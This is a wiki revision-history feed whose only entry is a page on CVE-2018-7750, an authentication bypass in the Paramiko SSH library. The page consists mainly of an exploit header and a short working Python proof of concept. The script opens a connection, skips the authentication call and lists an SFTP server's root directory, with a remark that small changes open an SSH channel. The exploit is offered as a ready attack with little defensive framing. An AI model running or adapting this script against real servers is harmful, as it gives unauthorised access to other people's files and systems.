<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-7750_Paramiko_2.4.1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2018-7750 Paramiko 2.4.1 身份驗證繞過漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-7750_Paramiko_2.4.1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-7750_Paramiko_2.4.1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T06:35:28Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2018-7750_Paramiko_2.4.1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;diff=1505&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Paramiko 2.4.1 - Authentication Bypass # Date: 2018-10-27 # Exploit Author: Adam Brown # Vendor Homepage: https://www.paramiko.org # Software Li...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-7750_Paramiko_2.4.1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;diff=1505&amp;oldid=prev"/>
		<updated>2021-04-11T01:20:30Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Paramiko 2.4.1 - Authentication Bypass # Date: 2018-10-27 # Exploit Author: Adam Brown # Vendor Homepage: https://www.paramiko.org # Software Li...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Paramiko 2.4.1 - Authentication Bypass&lt;br /&gt;
# Date: 2018-10-27&lt;br /&gt;
# Exploit Author: Adam Brown&lt;br /&gt;
# Vendor Homepage: https://www.paramiko.org&lt;br /&gt;
# Software Link: https://github.com/paramiko/paramiko/tree/v1.15.2&lt;br /&gt;
# Version: &amp;lt; 1.17.6, 1.18.x &amp;lt; 1.18.5, 2.0.x &amp;lt; 2.0.8, 2.1.x &amp;lt; 2.1.5, 2.2.x &amp;lt; 2.2.3, 2.3.x &amp;lt; 2.3.2, and 2.4.x &amp;lt; 2.4.1&lt;br /&gt;
# Tested on: Multiple&lt;br /&gt;
# CVE : CVE-2018-7750&lt;br /&gt;
 &lt;br /&gt;
# This PoC is based on discussions found at the following github issue:&lt;br /&gt;
# https://github.com/paramiko/paramiko/issues/1175&lt;br /&gt;
# TLDR, Paramiko doesn't check if the client has completed the authentication step&lt;br /&gt;
# before allowing the client to open channels. The PoC below connects to an SFTP&lt;br /&gt;
# server, and lists the root directory without authenticating. Slight modification&lt;br /&gt;
# is required if you want to open an SSH channel.&lt;br /&gt;
 &lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
import paramiko&lt;br /&gt;
 &lt;br /&gt;
host = '127.0.0.1'&lt;br /&gt;
port = 22&lt;br /&gt;
 &lt;br /&gt;
trans = paramiko.Transport((host, port))&lt;br /&gt;
trans.start_client()&lt;br /&gt;
 &lt;br /&gt;
# If the call below is skipped, no username or password is required.&lt;br /&gt;
# trans.auth_password('username', 'password')&lt;br /&gt;
 &lt;br /&gt;
sftp = paramiko.SFTPClient.from_transport(trans)&lt;br /&gt;
print(sftp.listdir('/'))&lt;br /&gt;
sftp.close()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>